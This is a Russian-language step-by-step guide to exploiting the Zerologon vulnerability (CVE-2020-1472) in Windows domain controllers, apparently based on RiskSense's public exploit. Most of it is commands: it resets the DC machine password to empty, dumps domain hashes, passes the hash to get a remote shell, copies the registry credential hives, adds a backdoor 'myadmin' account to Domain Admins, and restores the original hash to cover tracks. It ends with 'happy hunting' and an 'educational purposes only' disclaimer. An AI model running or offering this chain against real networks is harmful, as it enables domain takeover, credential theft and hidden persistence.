
Скрипт zerologon для эксплуатации CVE-2020-1472 CVSS 10/10
Скрипт zerologon для эксплуатации CVE-2020-1472 CVSS 10/10 Эксплойт-код основан на https://www.secura.com/blog/zero-logon и https://github.com/SecuraBV/CVE-2020-1472. Оригинальное исследование и сканер — от Secura, модификации — от RiskSense Inc. https://github.com/risksense/zerologon
Для эксплуатации удалите все предыдущие установки Impacket и установите Impacket из https://github.com/SecureAuthCorp/impacket/commit/b867b21 или новее.
apt update
apt remove --purge impacket-scripts python3-impacket
apt autoremove
git clone https://github.com/rthalley/dnspython.git
sudo python3 setup.py install
cd ..
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 setup.py install
git clone
Затем выполните:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
Если это сработает, вы сможете:
sudo secretsdump.py -just-dc domain/hostname\$@ip
нажатие «Enter» при запросе пароля пропустит вас дальше, что должно дать вам хеш администратора домена. После этого используйте wmiexec.py для целевого DC с учётными данными из secretsdump
wmiexec.py domain/Administrator@ip -hashes hash
и выполните:
reg save HKLM\SYSTEM system.save
get system.save
del /f system.save
reg save HKLM\SAM sam.save
get sam.save
del /f sam.save
reg save HKLM\SECURITY security.save
get security.save
del /f security.save
Затем, на всякий случай, вы можете создать новую учётную запись администратора,
net user myadmin Hello1234 /ADD /DOMAIN
и добавить новую учётную запись в группу администраторов домена для получения полных привилегий,
net group "Domain Admins" myadmin /ADD /DOMAIN
и, вероятно, теперь exit из C:>
Затем вы можете запустить:
sudo secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
И это должно показать вам исходный NT-хеш учётной записи компьютера. Затем вы можете восстановить исходный хеш учётной записи компьютера в домене командой
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
Восстановление исходного хеша необходимо для продолжения нормальной работы DC.
И просто чтобы убедиться, что процесс восстановления сработал,
sudo secretsdump.py -just-dc domain/hostname\$@ip
и нажатие «Enter» при запросе пароля больше не сработает.
И на этом всё.
Удачной охоты.
ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Это исключительно в образовательных целях, я не несу ответственности за любые действия или их последствия ВЗЛОМ ЧУЖОГО УСТРОЙСТВА НЕЗАКОНЕН И НАКАЗУЕМ ПО ЗАКОНУ.